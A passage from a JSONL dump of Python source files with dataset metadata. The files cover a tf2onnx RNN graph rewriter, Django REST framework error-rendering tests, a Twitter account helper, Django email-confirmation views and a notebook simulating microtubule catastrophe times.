seq_len_nodes = []\n for n in self.g.get_nodes():\n if not n.name.startswith(rnn_scope_name):\n continue\n\n if n.name.endswith(\"sequence_length\") and n.type == \"Identity\":\n log.debug(\"find non-const sequence length node\")\n elif \"CheckSeqLen\" in n.name and n.is_const():\n # if seq length is const, the node might be const folded,\n # so we check this way.\n log.debug(\"find const sequence length node\")\n else:\n continue\n seq_len_nodes.append(n)\n\n seq_len_node_cnt = len(seq_len_nodes)\n if seq_len_node_cnt == 0:\n return None\n if seq_len_node_cnt == 1:\n seq_len_node = seq_len_nodes[0]\n if seq_len_node.is_const():\n return seq_len_node\n # input of the \"identity\" node may be a \"cast\"\n # if so, then we have to keep it\n # sentence \"math_ops.to_int32(sequence_length)\" in tf results in the \"cast\" op\n if seq_len_node.inputs[0].type == \"Cast\":\n cast_node = seq_len_node.inputs[0]\n if not cast_node.inputs[0].name.startswith(rnn_scope_name):\n return seq_len_node.inputs[0]\n raise ValueError(\"sequence length node should be outside of rnn scope\")\n if not seq_len_node.inputs[0].name.startswith(rnn_scope_name):\n return seq_len_node.inputs[0]\n raise ValueError(\"sequence length node should be outside of rnn scope\")\n raise ValueError(\"there are more sequence length nodes than expected\")\n\n def get_rnn_input_blacklist(self, rnn_weights, rnn_props):\n var_init_nodes = []\n for _, init_input_id in rnn_props.var_initializers.items():\n init_node = self.g.get_node_by_output(init_input_id)\n var_init_nodes.append(init_node)\n\n # weight/bias inputs, and c/h initializers are dynamic_rnn/LSTMCell's parameters.\n # we will use them to filter out the dynamic_rnn's input tensor.\n blacklist_inputs = [rnn_weights.kernel.node, rnn_weights.bias.node, rnn_weights.forget_bias.node]\n blacklist_inputs.extend(var_init_nodes)\n\n return blacklist_inputs\n\n def find_inputs(self, rnn_scope_name, rnn_props, match, input_blacklist=None):\n rnn_input_nodes = []\n for n in self.g.get_nodes():\n if n.name.startswith(rnn_scope_name):\n # find input node that are not within rnn scope\n for input_id, input_node in zip(n.input, n.inputs):\n if not input_node.name.startswith(rnn_scope_name):\n if input_node not in 
input_blacklist:\n                            rnn_input_nodes.append([input_node, input_id])\n\n        if len(rnn_input_nodes) != 1:\n            log.debug(\"found %d inputs for the dynamic_rnn, unexpected. They are %s\",\n                      len(rnn_input_nodes), rnn_input_nodes)\n            return rnn_props\n\n        input_node_candidate = rnn_input_nodes[0][0]\n        input_id_candidate = rnn_input_nodes[0][1]\n\n        # we should not limit the rnn_input_nodes' type to be Placeholder or Const,\n        # because there might be some Reshape/etc. ops after the Placeholder\n        rnn_props.input_node = input_node_candidate\n        rnn_props.input_id = input_id_candidate\n        return rnn_props\n\n# process found info according to ONNX requirement\n    def process_input_x(self, rnn_props, rnn_scope_name):\n        self.print_step(\"look for possible transpose following RNN input node\")\n        # todo: peepholes P is not considered now\n        input_consumers = self.g.find_output_consumers(rnn_props.input_id)\n        consumers_in_rnn_scope = []\n        for consumer in input_consumers:\n            if consumer.name.startswith(rnn_scope_name):\n                consumers_in_rnn_scope.append(consumer)\n\n        if len(consumers_in_rnn_scope) != 1:\n            log.warning(\"RNN input node has %d consumers in current rnn scope %s, skip\",\n                        len(consumers_in_rnn_scope), rnn_scope_name)\n            return None\n\n        possible_transpose_after_input = consumers_in_rnn_scope[0]\n\n        self.print_step(\"convert the transpose to onnx node if there is one found.\")\n        # check whether time_major is enabled or not\n        # in TF, if time_major is not enabled, input format is [batch, time, ...]\n        # but, during TF handling, at the beginning, the data will be transposed to [time, batch, ...]\n        # after processing, the format is changed back before returning result.\n        # So here, we judge the time_major by checking the transpose operator existence.\n        converted_transpose = self._convert_timemajor_transpose(possible_transpose_after_input)\n        if converted_transpose:\n            log.debug(\"detect batch-major inputs\")\n            rnn_props.time_major = False\n            rnn_props.x_input_id = converted_transpose.output[0]\n            self.all_nodes.extend([converted_transpose])\n        else:\n            log.debug(\"detect time-major inputs\")\n            rnn_props.time_major = True\n            rnn_props.x_input_id = rnn_props.input_id\n\n        rnn_props.onnx_input_ids[\"X\"] = rnn_props.x_input_id\n        return rnn_props\n\n    def process_weights_and_bias(self, rnn_weights, rnn_props):\n        pass\n\n    def process_var_init_nodes(self, rnn_props):\n        pass\n\n    def process_seq_length(self, rnn_props, seq_length_node):\n        # output: [time step, batch size, input size]\n        shape_node = self.g.make_node(\"Shape\", [rnn_props.x_input_id])\n\n        # LSTMCell only allows inputs of [batch size, input_size], so we assume dynamic_rnn has 3 dims.\n        # Slice cannot support Int64 in OPSET 7, so we cast here.\n        cast_shape_node = self.g.make_node(\"Cast\", [shape_node.output[0]],\n                                           attr={\"to\": onnx_pb.TensorProto.FLOAT},\n                                           shapes=[self.g.get_shape(shape_node.output[0])])\n\n        batchsize_node = self.g.make_node(\"Slice\", [cast_shape_node.output[0]],\n                                          attr={\"axes\": [0], \"starts\": [1], \"ends\": [2]})\n\n        # Tile's repeats must be INT64\n        repeat_node = self.g.make_node(\"Cast\", [batchsize_node.output[0]],\n                                       attr={\"to\": onnx_pb.TensorProto.INT64})\n\n        self.all_nodes.extend([shape_node, cast_shape_node, batchsize_node, repeat_node])\n\n        if not seq_length_node:\n            timestep_node = self.g.make_node(\"Slice\", [cast_shape_node.output[0]],\n                                             attr={\"axes\": [0], \"starts\": [0], \"ends\": [1]})\n\n            tile_node = self.g.make_node(\"Tile\", [timestep_node.output[0], repeat_node.output[0]])\n\n            # LSTM sequence_lens needs to be int32\n            seq_length_node = 
self.g.make_node('Cast', [tile_node.output[0]],\n attr={\"to\": onnx_pb.TensorProto.INT32})\n\n self.all_nodes.extend([timestep_node, tile_node, seq_length_node])\n\n rnn_props.onnx_input_ids[\"sequence_lens\"] = seq_length_node.output[0]\n return seq_length_node, batchsize_node\n\n def process_outputs(self, match, rnn_node, rnn_props, rnn_scope_name):\n # There are 2 kinds of output nodes for dynamic_rnn\n # 1. output node, which ends with \"Exit\" followed\n # either Transpose (when time_major is False),\n # or TensorArrayGather\n # 2. cell_state node,\n # 2.1 if state_is_tuple is true:\n # 2.1.1 which ends with \"Exit\" followed by a Pack whose name is out of rnn scope.\n # 2.1.2 which ends with \"Exit\" for c and h respectively, when cell_state.c/h is used.\n # 2.2 which ends with \"Exit\" if state_is_tuple is false\n for n in self.g.get_nodes():\n if n.type == \"Exit\" and n.name.startswith(rnn_scope_name):\n if len(n.input) != 1:\n raise ValueError(\"exit's input count is \" + str(len(n.input)) + \" instead of 1\")\n switch = n.inputs[0]\n if switch.type != \"Switch\":\n log.debug(\"Exit has non-Switch input, skip.\")\n continue\n\n for var_name, funcs in self.switch_checkers.items():\n var_checker = funcs[0]\n var_exit_connector = funcs[1]\n\n enter_target_input_id = self.check_switch_by_usage_pattern(switch, match, var_checker)\n if enter_target_input_id:\n log.debug(\"this is %s exit node\", var_name)\n var_exit_connector(rnn_node, n, rnn_props)\n break\n\n def create_rnn_node(self, rnn_props):\n pass\n\n# helper function\n def check_switch_by_usage_pattern(self, switch_node, match, check_func):\n if switch_node.type != 'Switch':\n return None\n\n # the first input is data\n merge_node = switch_node.inputs[0]\n if merge_node.type != \"Merge\":\n return None\n\n target_node_input_id = None\n for merge_input in merge_node.inputs:\n if merge_input.type == 'Enter':\n target_node_input_id = merge_input.input[0]\n log.debug(\"a Switch >> Merge >> Enter is found called %s\", merge_input.inputs[0].name)\n break\n else:\n log.debug(\"skip the non-Enter input node of the merge_node\")\n continue\n\n # check whether it is c_initialize or h_initialize\n if target_node_input_id:\n switch_consumers = self.g.find_output_consumers(switch_node.output[1])\n assert len(switch_consumers) == 1\n if switch_consumers[0].type == \"Identity\":\n identity_consumers = self.g.find_output_consumers(switch_consumers[0].output[0])\n return check_func(target_node_input_id, identity_consumers, match)\n log.error(\"not expected, skip \")\n log.warning(\"is_switch_used_by found no merge>>Enter node\")\n\n return None\n\n @staticmethod\n def print_step(level_2, level_1=\"find_dynamic_run_unit\"):\n log.debug(level_1 + \" >> \" + level_2)\n\n def _workaround_fill_ch_init_node(self, initializer_input_id, rnn_props):\n node = self.g.get_node_by_output(initializer_input_id)\n if node.type != \"Fill\":\n return None\n\n fill_val = node.inputs[1].get_tensor_value()[0]\n fill_val_dtype = utils.ONNX_TO_NUMPY_DTYPE[node.inputs[1].dtype]\n\n # this must be int64, since Concat's input data type must be consistent.\n num_direction_node = self.g.make_const(utils.make_name(\"Const\"), np.array([1], dtype=np.float32))\n h_node = self.g.make_const(utils.make_name(\"Const\"), np.array([rnn_props.hidden_size], dtype=np.float32))\n b_node = rnn_props.batch_size_node\n # Concat in OPSET7 does not support int64.\n tile_shape = self.g.make_node(\"Concat\", [num_direction_node.output[0], b_node.output[0], h_node.output[0]],\n 
attr={\"axis\": 0})\n\n # Tile's repeats must be INT64\n attr = {\"to\": onnx_pb.TensorProto.INT64}\n tile_shape_int64 = self.g.make_node(\"Cast\", [tile_shape.output[0]], attr)\n\n const_node = self.g.make_const(utils.make_name(\"Const\"), np.array([[[fill_val]]], dtype=fill_val_dtype))\n tile_node = self.g.make_node(\"Tile\", [const_node.output[0], tile_shape_int64.output[0]])\n self.all_nodes.extend([tile_shape, tile_shape_int64, tile_node])\n return tile_node\n\n def _convert_timemajor_transpose(self, node):\n if not check_is_timemajor_transpose(node):\n log.debug(\"not found timemajor transpose\")\n return None\n\n log.debug(\"found timemajor transpose\")\n\n attr = {\"perm\": np.array([1, 0, 2], dtype=np.int64)}\n new_trans = self.g.make_node(\"Transpose\", [node.input[0]], attr=attr,\n shapes=[self.g.get_shape(node.output[0])],\n dtypes=[self.g.get_dtype(node.input[0])])\n self.g.replace_all_inputs(self.g.get_nodes(), node.output[0], new_trans.output[0])\n return new_trans\n","sub_path":"tf2onnx/rewriter/unit_rewriter_base.py","file_name":"unit_rewriter_base.py","file_ext":"py","file_size_in_byte":20614,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"84352101","text":"from __future__ import absolute_import\nimport unittest\nimport numpy as n\nfrom polyxsim import check_input\n\nclass test_input(unittest.TestCase):\n def test_reading(self): ## test method names begin 'test*'\n myinput = check_input.parse_input(input_file='simul.inp')\n myinput.read()\n def test_checking(self):\n myinput = check_input.parse_input(input_file='simul.inp')\n myinput.read()\n myinput.check()\n def test_initialize(self):\n myinput = check_input.parse_input(input_file='simul.inp')\n myinput.read()\n myinput.check()\n myinput.initialize()\n\nif __name__ == '__main__':\n unittest.main()\n","sub_path":"test/test_input.py","file_name":"test_input.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"224897513","text":"# coding: utf-8\n\nfrom datetime import datetime\nimport json\nfrom os.path import abspath, dirname, exists, join, realpath\n\nfrom twitter import Status, User\n\n\nHERE = abspath(dirname(realpath(__file__)))\nFLAGS = {\n 'AF': '🇦🇫',\n 'AR': '🇦🇷',\n 'AU': '🇦🇺',\n 'BR': '🇧🇷',\n 'CA': '🇨🇦',\n 'CN': '🇨🇳',\n 'DE': '🇩🇪',\n 'EU': '🇪🇺',\n 'FR': '🇫🇷',\n 'IN': '🇮🇳',\n 'ID': '🇮🇩',\n 'IR': '🇮🇷',\n 'IL': '🇮🇱',\n 'IT': '🇮🇹',\n 'JP': '🇯🇵',\n 'KR': '🇰🇷',\n 'MX': '🇲🇽',\n 'NL': '🇳🇱',\n 'PK': '🇵🇰',\n 'RU': '🇷🇺',\n 'SA': '🇸🇦',\n 'TR': '🇹🇷',\n 'UK': '🇬🇧',\n 'UN': '🇺🇳',\n 'US': '🇺🇸',\n 'ZA': '🇿🇦',\n}\n\n\nclass Account(object):\n def __init__(self, name, twitter_handler, country_representing, role, is_personal, verified):\n self.name = name\n self.twitter_handler = twitter_handler\n self.country_representing = country_representing\n self.role = role\n self.is_personal = is_personal\n self.verified = verified\n self.followings = []\n self.tweets = []\n self.fetch_timestamp = None\n self.filename = join(HERE, 'data', 'account-%s.json' % self.twitter_handler)\n\n def save(self):\n data = {\n 'followings': [f._json for f in self.followings],\n 'tweets': [t._json for t in self.tweets],\n 'fetch_timestamp': self.fetch_timestamp,\n }\n with open(self.filename, 'w') as outfile:\n json.dump(data, outfile, sort_keys=True, indent=1, separators=(',', ': '))\n\n def load(self):\n if not exists(self.filename):\n return False\n with open(self.filename, 'r') as infile:\n data = 
json.load(infile)\n self.followings = [User.NewFromJsonDict(f) for f in data['followings']]\n self.tweets = [Status.NewFromJsonDict(t) for t in data['tweets']]\n self.fetch_timestamp = data['fetch_timestamp']\n return self.fetch_timestamp is not None\n\n def fetch(self, api, from_internet_even_if_local_exists=False, save=True):\n if from_internet_even_if_local_exists or not self.load():\n self.followings = api.GetFriends(screen_name=self.twitter_handler)\n self.tweets = api.GetUserTimeline(screen_name=self.twitter_handler, count=200)\n self.fetch_timestamp = str(datetime.now())\n if save:\n self.save()\n return True\n return False\n\n def __str__(self):\n text = self.name or self.twitter_handler\n if self.country_representing in FLAGS:\n text += ' ' + FLAGS[self.country_representing]\n return text\n\n def verbose_title(self):\n text = self.name or self.twitter_handler\n if self.verified:\n text += '✔︎'\n if self.country_representing in FLAGS:\n text += \" (\"\n if self.role:\n text += self.role + \" of \"\n text += self.country_representing + ' ' + FLAGS[self.country_representing] + \")\"\n return text\n","sub_path":"twitter_helper.py","file_name":"twitter_helper.py","file_ext":"py","file_size_in_byte":3157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"66042486","text":"\"\"\"Test error response renderer\"\"\"\n\nfrom django.core.urlresolvers import reverse\nfrom rest_framework.relations import HyperlinkedRelatedField\nfrom rest_framework.serializers import ValidationError\nfrom rest_framework.permissions import IsAuthenticated\n\nfrom tests import models\nfrom tests.serializers import PersonSerializer\nfrom tests.utils import dump_json\nfrom tests.views import PersonViewSet\n\nimport pytest\nimport rest_framework\n\npytestmark = pytest.mark.django_db\n\n# \"Invalid hyperlink - object does not exist.\" - DRF 2.x\n# \"Invalid hyperlink - Object does not exist.\" - DRF 3.x\n# Both wrapped in a proxy class that needs to be unproxied\n# in order to serialized to JSON\ndoes_not_exist = (\n HyperlinkedRelatedField.default_error_messages['does_not_exist']\n .encode('utf-8').decode('utf-8'))\n\n\ndef test_required_field_omitted(client):\n data = {}\n data_json_api = dump_json({\"people\": data})\n\n response = client.post(\n reverse(\"person-list\"), data=data_json_api,\n content_type=\"application/vnd.api+json\")\n\n assert response.status_code == 400, response.content\n assert not models.Person.objects.exists()\n\n result_data = {\"name\": [\"This field is required.\"]}\n assert response.data == result_data\n\n results = {\n \"errors\": [{\n \"path\": \"/name\",\n \"detail\": \"This field is required.\",\n \"status\": \"400\"\n }]\n }\n\n assert response.content == dump_json(results)\n\n\ndef test_auth_required(rf):\n class RestrictedPersonViewSet(PersonViewSet):\n permission_classes = [IsAuthenticated]\n\n data = dump_json({\"people\": {\"name\": \"Jason Api\"}})\n\n request = rf.post(\n reverse(\"person-list\"), data=data,\n content_type=\"application/vnd.api+json\")\n view = RestrictedPersonViewSet.as_view({'post': 'create'})\n response = view(request)\n response.render()\n\n assert response.status_code == 403, response.content\n assert not models.Person.objects.exists()\n\n results = {\n \"errors\": [{\n \"status\": \"403\",\n \"title\": \"Authentication credentials were not provided.\"\n }]\n }\n assert response.content == dump_json(results)\n\n\ndef test_drf_non_field_validation_error(rf):\n '''DRF uses 'non_field_errors' as the 
key for non-field errors'''\n class LazyPersonSerializer(PersonSerializer):\n def validate(self, attr):\n raise ValidationError(\"Feeling lazy. Try again later.\")\n\n class LazyPersonViewSet(PersonViewSet):\n serializer_class = LazyPersonSerializer\n\n data = dump_json({\"people\": {\"name\": \"Jason Api\"}})\n\n request = rf.post(\n reverse(\"person-list\"), data=data,\n content_type=\"application/vnd.api+json\")\n view = LazyPersonViewSet.as_view({'post': 'create'})\n response = view(request)\n response.render()\n\n assert response.status_code == 400, response.content\n assert not models.Person.objects.exists()\n\n results = {\n \"errors\": [{\n \"status\": \"400\",\n \"path\": \"/-\",\n \"detail\": \"Feeling lazy. Try again later.\"\n }]\n }\n assert response.content == dump_json(results)\n\n\n@pytest.mark.skipif(\n rest_framework.__version__.split(\".\")[0] >= \"3\",\n reason=\"DRF 3+ no longer calls model.clean\",\n)\ndef test_django_non_field_validation_error(rf, monkeypatch):\n '''Django uses __all__ as the key for non-field errors\n\n Constant is django.core.exceptions.NON_FIELD_ERRORS\n '''\n def clean(self):\n raise ValidationError(\"I'm not taking any new people today\")\n\n monkeypatch.setattr(models.Person, 'clean', clean)\n data = dump_json({\"people\": {\"name\": \"Jason Api\"}})\n\n request = rf.post(\n reverse(\"person-list\"), data=data,\n content_type=\"application/vnd.api+json\")\n view = PersonViewSet.as_view({'post': 'create'})\n response = view(request)\n response.render()\n\n assert response.status_code == 400, response.content\n assert not models.Person.objects.exists()\n\n results = {\n \"errors\": [{\n \"status\": \"400\",\n \"path\": \"/-\",\n \"detail\": \"I'm not taking any new people today\"\n }]\n }\n assert response.content == dump_json(results)\n\n\ndef test_invalid_forward_relation(client):\n assert not models.Person.objects.exists()\n\n data = dump_json({\n \"posts\": {\n \"title\": \"This is the title\",\n \"author\": \"http://testserver/people/1/\",\n \"comments\": [],\n }\n })\n\n response = client.post(\n reverse(\"post-list\"), data=data,\n content_type=\"application/vnd.api+json\")\n\n assert response.status_code == 400, response.content\n assert response['content-type'] == 'application/vnd.api+json'\n assert not models.Post.objects.exists()\n\n results = {\n \"errors\": [{\n \"status\": \"400\",\n \"path\": \"/author\",\n \"detail\": does_not_exist\n }]\n }\n\n assert response.content == dump_json(results)\n\n\ndef test_invalid_reverse_relation(client):\n author = models.Person.objects.create(name=\"The Author\")\n assert not models.Comment.objects.exists()\n data = dump_json({\n \"posts\": {\n \"title\": \"This is the title\",\n \"author\": \"http://testserver/people/%d/\" % author.pk,\n \"comments\": [\"http://testserver/comments/1/\"]\n }\n })\n\n response = client.post(\n reverse(\"post-list\"), data=data,\n content_type=\"application/vnd.api+json\")\n\n assert response.status_code == 400, response.content\n assert response['content-type'] == 'application/vnd.api+json'\n\n results = {\n \"errors\": [{\n \"status\": \"400\",\n \"path\": \"/comments\",\n \"detail\": does_not_exist\n }]\n }\n\n assert response.content == dump_json(results)\n\n\ndef test_bad_json(client):\n data = \"{'people': {'name': 'Jason Api'}}\" # Wrong quotes\n\n response = client.post(\n reverse(\"person-list\"), data=data,\n content_type=\"application/vnd.api+json\")\n\n assert response.status_code == 400, response.content\n assert response['content-type'] == 
'application/vnd.api+json'\n\n results = {\n \"errors\": [{\n \"status\": \"400\",\n \"detail\": (\n \"JSON parse error - Expecting property name enclosed in\"\n \" double quotes: line 1 column 2 (char 1)\"),\n }]\n }\n assert response.content == dump_json(results)\n","sub_path":"tests/test_errors.py","file_name":"test_errors.py","file_ext":"py","file_size_in_byte":6412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"157746018","text":"from django.test import TestCase\n\nfrom api.v1.tests.factories import ClientFactory, ClientAccountFactory, ExternalAssetFactory, \\\n RegionFactory, AddressFactory, RiskProfileGroupFactory, \\\n AccountTypeRiskProfileGroupFactory, GroupFactory, UserFactory, \\\n GoalFactory\nfrom main.constants import ACCOUNT_TYPE_PERSONAL\nfrom common.constants import GROUP_SUPPORT_STAFF\n\n\nclass ClientTests(TestCase):\n def setUp(self):\n self.support_group = GroupFactory(name=GROUP_SUPPORT_STAFF)\n # client with some personal assets, cash balance and goals\n self.region = RegionFactory.create()\n self.betasmartz_client_address = AddressFactory(region=self.region)\n self.risk_group = RiskProfileGroupFactory.create(name='Personal Risk Profile Group')\n self.personal_account_type = AccountTypeRiskProfileGroupFactory.create(account_type=0,\n risk_profile_group=self.risk_group)\n self.user = UserFactory.create()\n self.betasmartz_client = ClientFactory.create(user=self.user)\n\n self.betasmartz_client_account = ClientAccountFactory(primary_owner=self.betasmartz_client, account_type=ACCOUNT_TYPE_PERSONAL)\n self.external_asset1 = ExternalAssetFactory.create(owner=self.betasmartz_client)\n self.external_asset2 = ExternalAssetFactory.create(owner=self.betasmartz_client)\n\n self.goal1 = GoalFactory.create(account=self.betasmartz_client_account)\n self.goal2 = GoalFactory.create(account=self.betasmartz_client_account)\n\n self.betasmartz_client2 = ClientFactory.create()\n\n def tearDown(self):\n self.client.logout()\n\n # Tests below this validate the client model's internal functionality\n # they do not test api endpoints\n def test_net_worth(self):\n \"\"\"\n verify that the client's net worth property returns the expected\n amount for the client's assets\n \"\"\"\n assets_sum = self.external_asset1.get_growth_valuation() + self.external_asset2.get_growth_valuation()\n # a clientaccount with a cash balance and some goals\n accounts_sum = 0.0\n accounts_sum += self.betasmartz_client_account.cash_balance\n for goal in self.betasmartz_client_account.goals:\n accounts_sum += goal.cash_balance\n expected_net_worth = float(assets_sum) + accounts_sum\n self.assertAlmostEqual(self.betasmartz_client.net_worth, expected_net_worth)\n\n # expecting client.net_worth using @property to have cached this initial result\n # lets make sure the underlying client._net_worth() function is tracking the right info\n # ok, let's add to the cash balance and check again\n self.betasmartz_client_account.cash_balance += 2000.0\n self.betasmartz_client_account.save()\n expected_net_worth += 2000.0\n self.assertAlmostEqual(self.betasmartz_client._net_worth(), expected_net_worth)\n","sub_path":"client/tests/test_client.py","file_name":"test_client.py","file_ext":"py","file_size_in_byte":3052,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"373030933","text":"from django.urls import path, include\nimport core.views as core_views\nimport zinc.views as zinc_views\n\nurlpatterns = [\n 
path(r\"api///\", zinc_views.api_object),\n path(r\"api/pdbs/\", zinc_views.PdbViewSet.as_view({\"get\": \"list\"})),\n path(r\"api/sites/\", zinc_views.ZincSiteViewSet.as_view({\"get\": \"list\"})),\n path(r\"api/chain-clusters/\", zinc_views.ChainClusterViewSet.as_view({\"get\": \"list\"})),\n path(r\"api/site-clusters/\", zinc_views.ZincSiteClusterViewSet.as_view({\"get\": \"list\"})),\n path(r\"api/search\", zinc_views.PdbSearchResults.as_view({\"get\": \"list\"})),\n path(r\"api/search/\", zinc_views.PdbSearchResults.as_view({\"get\": \"list\"})),\n path(r\"api/\", zinc_views.api),\n path(r\"search\", zinc_views.search),\n path(r\"search/\", zinc_views.search),\n path(r\"data/\", core_views.data),\n path(r\"data/all/\", core_views.all_data),\n path(r\"about/\", core_views.about),\n path(r\"help/\", core_views.help),\n path(r\"changelog/\", core_views.changelog),\n path(r\"pdbs//\", zinc_views.pdb),\n path(r\"/\", zinc_views.zinc_site),\n path(r\"\", core_views.home),\n]\n","sub_path":"core/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1072,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"181832112","text":"from django.contrib.auth.tokens import default_token_generator\nfrom django.core.mail import send_mail\nfrom django.http import JsonResponse\nfrom django.conf import settings\nfrom django.shortcuts import get_object_or_404\n\nfrom rest_framework_simplejwt.serializers import User\nfrom rest_framework.decorators import action, api_view\nfrom rest_framework_simplejwt.tokens import AccessToken\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom rest_framework import viewsets\nfrom rest_framework import filters\nfrom rest_framework.permissions import IsAuthenticated\n\nfrom .serializer import UserSerializer, EmailSerializer\nfrom .models import User\nfrom .permissions import IsAdministrator\n\n\n@api_view(['POST'])\ndef email(request):\n \"\"\"Send confirmation_code by email.\"\"\"\n email = request.POST['email']\n serializer = EmailSerializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n user = User.objects.get_or_create(\n username=email, email=email, is_active=False)[0]\n confirmation_code = default_token_generator.make_token(user)\n send_mail('Подтверждение регистрации',\n f'Пожалуйста, сохраните этот код : {confirmation_code},'\n ' он Вам понадобиться для получения токена',\n settings.EMAIL_ADDRESS,\n [email], fail_silently=False)\n return JsonResponse(serializer.validated_data)\n\n\n@api_view(['POST'])\ndef get_token(request):\n \"\"\"Generate access token.\"\"\"\n email = request.POST['email']\n serializer = EmailSerializer(data=request.data)\n serializer.is_valid(raise_exception=True)\n confirmation_code = request.POST['confirmation_code']\n user = get_object_or_404(User, email=email)\n if default_token_generator.check_token(user, confirmation_code):\n user.is_active = True\n user.save()\n token = AccessToken.for_user(user)\n return JsonResponse({'token': str(token)})\n return Response({\"message\": \"confirmation_code или email не верны\"},\n status=status.HTTP_400_BAD_REQUEST)\n\n\nclass UserViewSet(viewsets.ModelViewSet):\n queryset = User.objects.all()\n serializer_class = UserSerializer\n filter_backends = [filters.SearchFilter]\n search_fields = ['username', ]\n lookup_field = 'username'\n permission_classes = [IsAuthenticated, IsAdministrator]\n\n @action(\n detail=False,\n methods=['get', 'patch'],\n permission_classes=[IsAuthenticated]\n )\n 
def me(self, request):\n user = User.objects.filter(username=request.user)[0]\n if request.method == 'GET':\n serializer = self.get_serializer(user)\n return Response(serializer.data)\n if request.method == 'PATCH':\n serializer = self.get_serializer(\n user, data=request.data, partial=True)\n serializer.is_valid(raise_exception=True)\n serializer.save()\n return Response(serializer.data,\n status=status.HTTP_200_OK)\n","sub_path":"auth_user/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"362115487","text":"# -*- coding: utf-8 -*-\n# ---\n# jupyter:\n# jupytext:\n# text_representation:\n# extension: .py\n# format_name: light\n# format_version: '1.3'\n# jupytext_version: 0.8.6\n# kernelspec:\n# display_name: Python 3\n# language: python\n# name: python3\n# ---\n\n\"\"\"\ncode to generate Figure 2, which \nexplores what different values of beta1 and beta2 affect\nthe catastrophe times the two-arrival story.\nAlso has a plot of brentq roots for MLE of beta1 / beta2\n\"\"\"\n\n# +\nimport os, sys, subprocess\n\nimport tidy_data\n\nimport pandas as pd\nimport numpy as np\n\nimport scipy.stats\nimport iqplot\n\nimport panel as pn\n\nimport bokeh.io\nbokeh.io.output_notebook()\npn.extension()\n\ndata_path = \"../data/\"\n# -\n\ndef _create_df_for_dashboard():\n \"\"\"\n create a dataframe of various values of beta1 and beta2\n and the corresponding time to catastrophe.\n Modeled by a joint exponential distribution that is added together\n \n Inputs:\n None\n Outputs:\n df\n \n Notes: This is not user-facing, since we use it for plotting the dashboard\n that explores varying values of beta1 and beta2\n \"\"\"\n # set possible values for beta1 and beta2\n # recall these are rates, so beta1s[2] corresponds to 1 per 100 seconds\n beta1s = [1,1/30,1/100,1/300,1/1000,1/3000]\n beta2s = [1,1/30,1/100,1/300,1/1000,1/3000]\n\n # make an empty ndarray to store our samples\n samples = np.ndarray((0,3))\n \n rg = np.random.default_rng()\n \n for i, beta1 in enumerate(beta1s):\n for j, beta2 in enumerate(beta2s):\n\n # draw times; numpy takes 1/beta for the scale\n t1 = rg.exponential(1/beta1, size=150)\n t2 = rg.exponential(1/beta2, size=150)\n\n catast_t = [(t1[k] + t2[k], beta1, beta2) for k in range(len(t1))]\n\n # store the samples\n samples = np.concatenate((samples, catast_t))\n\n # move samples into a dataframe\n df = pd.DataFrame(data=samples, columns=['time to catastrophe (s)','beta1','beta2'])\n return df\n\ndef _extract_sub_df(df, beta1, beta2):\n \"\"\"\n Pulls data from df corresponding to the chosen beta1 and beta2.\n \"\"\"\n \n inds = (\n np.isclose(df[\"beta1\"], beta1)\n & np.isclose(df[\"beta2\"], beta2)\n )\n \n return df.loc[inds, :]\n\ndef plot_ecdf(df, beta1, beta2):\n \"\"\"\n Dashboarding.\n Generates the ECDF for the chosen beta1 and beta2.\n \"\"\"\n \n sub_df = _extract_sub_df(df, beta1, beta2)\n \n return iqplot.ecdf(data=sub_df, q=\"time to catastrophe (s)\")\n\n# +\n# uncomment to use code\ndf = _create_df_for_dashboard()\n\nbeta1_slider = pn.widgets.DiscreteSlider(\n name='beta1',\n options=list(df[\"beta1\"].unique()),\n value = 1.0\n)\n\nbeta2_slider = pn.widgets.DiscreteSlider(\n name='beta2',\n options=list(df[\"beta2\"].unique()),\n value = 1.0\n)\n\n# Make the ECDF depend on the selected values of beta1 and beta2\n\n@pn.depends(\n beta1=beta1_slider.param.value, \n beta2=beta2_slider.param.value\n)\ndef plot_ecdf_pn(beta1, beta2):\n return 
plot_ecdf(df, beta1, beta2)\n# -\n\ndef _draw_model(beta_1, beta_2, size=1):\n \"\"\"\n draw out of two exponential distributions\n parametrized by beta_1 and beta_2\n \"\"\"\n rg = np.random.default_rng()\n return rg.exponential(1/beta_1, size=size) + rg.exponential(1/beta_2, size=size)\n\n# +\ndef plot_beta_ratios_ecdf():\n \"\"\"\n different expected catastrophe times for different ratios of beta1/beta2;\n ratio range of [0.1, 0.3, 1, 3, 10]\n Inputs:\n None\n Outputs:\n Bokeh figure\n \"\"\"\n n_samples = 150\n p = None\n\n p = bokeh.plotting.figure(\n frame_height=300,\n frame_width=450,\n x_axis_label=\"time to catastrophe × β₁\",\n y_axis_label=\"ECDF\",\n )\n\n beta_ratio = [0.1, 0.3, 1, 3, 10]\n\n catastrophe_times = np.concatenate(\n [_draw_model(1, br, size=n_samples) for br in beta_ratio]\n )\n beta_ratios = np.concatenate([[br] * n_samples for br in beta_ratio])\n df = pd.DataFrame(\n data={\"β₂/β₁\": beta_ratios, \"time to catastrophe × β₁\": catastrophe_times}\n )\n\n p = iqplot.ecdf(\n df,\n q=\"time to catastrophe × β₁\",\n cats=\"β₂/β₁\",\n palette=bokeh.palettes.Magma7[1:-1][::-1],\n )\n p.legend.title = \"β₂/β₁\"\n p.title.text = 'β₂/β₁ ratio effect on joint exponential distribution'\n return p\n\n#to use, uncomment this\n# p = plot_beta_ratios_ecdf()\n# bokeh.io.show(p)\n# -\n\ndef _dl_ddb(beta_1, times_to_catastrophe):\n \"\"\"\n coding up d(ell)/db\n \"\"\"\n t_bar = times_to_catastrophe.mean()\n n = 